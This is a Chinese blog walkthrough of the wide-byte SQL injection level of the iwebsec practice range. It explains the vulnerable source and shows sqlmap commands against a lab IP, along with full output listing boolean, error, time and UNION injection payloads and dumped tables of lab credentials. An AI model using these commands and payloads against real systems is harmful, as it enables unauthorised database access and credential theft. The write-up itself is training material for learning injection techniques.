iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入

系列文章目录

前言

打开靶场的SQL注入关卡的第06关，宽字节注入 iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入（报错型盲注）_mooyuan的博客-CSDN博客如下所示

一、源码分析

如下所示，SQL语句与1-5关的大多数关卡一样，调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入，并且没有对参数id做任何过滤。

不过在输出内容中可以得知仅sql查询成功时输出正确的id，用户名和密码。在错误的时候却执行语句print_r(mysql_error());这个报错语句的使用意味着我们可以利用报错型函数如updatexml，extractvalue等函数进行SQL注入，换言之渗透方法可以参考第05关报错型注入。不过呢，本关卡的源码中如下语句说明其为宽字节型

mysql_query("SET NAMES gbk");

也就是说本关卡的注入可以使用报错型的宽字节注入

二、sqlmap注入

1.注入命令

方法1：参数id后加上%df

sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df  --current-db --dump --batch

如下所示，渗透成功

方法2：sqlmap的注入命令语句使用--tamper unmagicquotes

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch  --tamper unmagicquotes

2.完整交互过程

完整的注入交互如下所示


kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df  --current-db --dump --batch
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[.]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                                                                                                                  
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:36:21 /2022-11-24/
 
[23:36:21] [INFO] resuming back-end DBMS 'mysql' 
[23:36:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8465=8465) THEN 1 ELSE (SELECT 7769 UNION SELECT 3720) END))
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1776 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(1776=1776,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2424 FROM (SELECT(SLEEP(5)))vTBV)
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171717871,0x7a756e6165784e50754f725a797052684779706b716f4d504b4e7354596277657354776f4f724468,0x7170707171)-- -
---
[23:36:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[23:36:22] [INFO] fetching current database
current database: 'iwebsec'
[23:36:22] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:36:22] [INFO] fetching current database
[23:36:22] [INFO] fetching tables for database: 'iwebsec'
[23:36:22] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+
 
[23:36:22] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:36:22] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
 
[23:36:22] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:36:22] [INFO] fetching columns for table 'users' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+
 
[23:36:22] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[23:36:22] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | 1 onerror=alert(/ctfs/)/> |
| 6  | 1 onerror=alert(/ctfs/)/> |
| 5  | 1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  |                  |
+----+------------------------------------+
 
[23:36:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[23:36:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:36:22] [WARNING] your sqlmap version is outdated
 
[*] ending @ 23:36:22 /2022-11-24/

总结

iwebsec靶场的宽字节注入由于使用了报错函数，加上类型为宽字节，而闭合的判断上只是与前几关一样为普通的数字型注入，故而搞清楚原理后，只需要配置正确参数使用sqlmap渗透十分方便高效。初学者还是应该以手动注入方法练习，真正了解原理后可以在使用sqlmap来提升速度。

相关阅读:
Leetcode 349 两个数组的交集（*哈希数组，*HashSet，*HashMap）
【数仓】数仓建模理论及步骤，ER建模，维度建模，星形模型，雪花模型，数据分层
 OpenCV3.4之VideoCapture分析
 实现Kickstart + NFS + DHCP + PXE的全自动远程无人职守安装
 分布式爬虫关闭（scrapy）
Mybatis—mapper配置文件xml位置
 山东大学单片机原理与应用实验 4.5 8255并行I／O扩展及交通信号灯控制实验
 用 docker 创建 jmeter 容器，能做性能测试？
工业智能网关BL110应用之二十七：如何设置COM 透传
 c# winform 实际操作XML代码，包括创建、保存、查询、删除窗体演示
原文地址：https://blog.csdn.net/mooyuan/article/details/128035982